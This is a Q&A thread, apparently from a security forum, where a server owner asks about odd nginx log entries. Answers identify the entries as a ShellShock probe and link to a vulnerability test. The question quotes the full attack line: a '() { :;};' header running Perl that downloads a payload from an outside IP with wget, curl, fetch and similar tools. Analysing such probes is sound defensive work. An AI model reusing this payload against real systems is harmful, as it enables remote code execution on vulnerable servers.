# sketchy nginx access log entries

Tags: nginx, security, log-files

There were quite a few entries as below in the nginx access log. How do I know the outcome of these scripts and if my server is compromised or no?

```
162.232.183.48 - - [14/Jan/2016:10:54:57 +0000] "GET /cgi-bin/php4 HTTP/1.1" 200 1494 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22 wget http://2
04.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download  http://204.232
.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png  \x22);'" "-"
```

Answer (score 2, accepted):

Notice the magic string `() { :; };`. They are trying to poke around and see if your server is vulnerable to the [ShellShock exploit](https://blog.cloudflare.com/inside-shellshock/). Perl is used here to print and see if the attack succeeded.

[Test if your server is vulnerable to ShellShock](https://security.stackexchange.com/questions/68168/is-there-a-short-command-to-test-if-my-server-is-secure-against-the-shellshock-b). If it's not, you are clear.

See also: [Is my server vulnerable to a perl exploit?](https://security.stackexchange.com/questions/110725/is-my-server-vulnerable-to-a-perl-exploit)

Answer (score 2):

He's looking to do shellshock against you.  The funny thing is that he misconfigured his attack.  I do malware capture and his wget/fetch/etc fail because his package ain't there :-)